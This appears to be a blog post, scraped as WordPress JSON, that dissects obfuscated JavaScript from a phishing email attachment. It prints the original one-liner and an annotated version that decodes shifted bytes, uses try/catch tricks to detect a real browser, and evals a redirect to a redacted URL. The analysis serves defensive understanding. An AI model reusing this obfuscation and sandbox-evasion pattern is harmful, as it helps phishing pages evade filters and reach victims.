I got this snippet in an html file attached to a phishing email.<\/p>\n
d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc...];for(i=0;i<a.length;i++){a[i]-=2;}\r\ntry{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}\r\nif(!zz)eval(String.fromCharCode.apply(String,a));<\/pre>\nI’ve reformatted and annotated it for readability.<\/p>\n
\/\/ hide redirect as ascii bytes\r\na = [0x78,0x63,0x74,0x33, etc...];\r\n\r\n\/\/ \"decrypt\" our malicious code\r\n\/\/ maybe this is good enough to defeat filters looking for encoded redirects?\r\nfor (i = 0; i < a.length; i++) {\r\n a[i] -= 2;\r\n}\r\n\r\n\/\/detect if we're in a real browser\r\ntry {\r\n\t\/\/throws exception because you can't increment a node\r\n document.body++\r\n} catch(e) {\r\n \/\/ running in a real browser\r\n notInBrowser = 0;\r\n}\r\n\r\ntry {\r\n \/\/this throws an exception if we didn't throw an exception above\r\n \/\/(notInBrowser will be undefined)\r\n notInBrowser &= 2\r\n}\r\ncatch(e) {\r\n notInBrowser = 1;\r\n}\r\n\/\/ if we are in a browser, do the redirect\r\n\/\/ remember 0 == false and 1 == true \r\nif (!notInBrowser) {\r\n eval(String.fromCharCode.apply(String,a));\r\n}<\/pre>\nThe decrypted code fed to the eval:<\/p>\n
var1=49;\r\nvar2=var1;\r\nif(var1==var2) {document.location=\"http:\/\/[redacted]:8080\/forum\/links\/column.php\";}<\/pre>\nI’m not sure what was at the url. It was probably a phishing page or a browser exploit. If anyone can explain why they used a second try-catch instead of an if-statement, let me know.<\/p>\n
This guy has a similar post that explains the document.body++<\/code>.
\nhttp:\/\/jeffreysambells.com\/2012\/12\/12\/anatomy-of-a-hack<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"I got this snippet in an html file attached to a phishing email. d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc…];for(i=0;i<a.length;i++){a[i]-=2;} try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;} if(!zz)eval(String.fromCharCode.apply(String,a)); I’ve reformatted and annotated it for readability. \/\/ hide redirect as ascii bytes a = [0x78,0x63,0x74,0x33, etc…]; \/\/ “decrypt” our malicious code \/\/ maybe this is good enough to defeat filters looking for encoded redirects? for (i = … <\/p>\n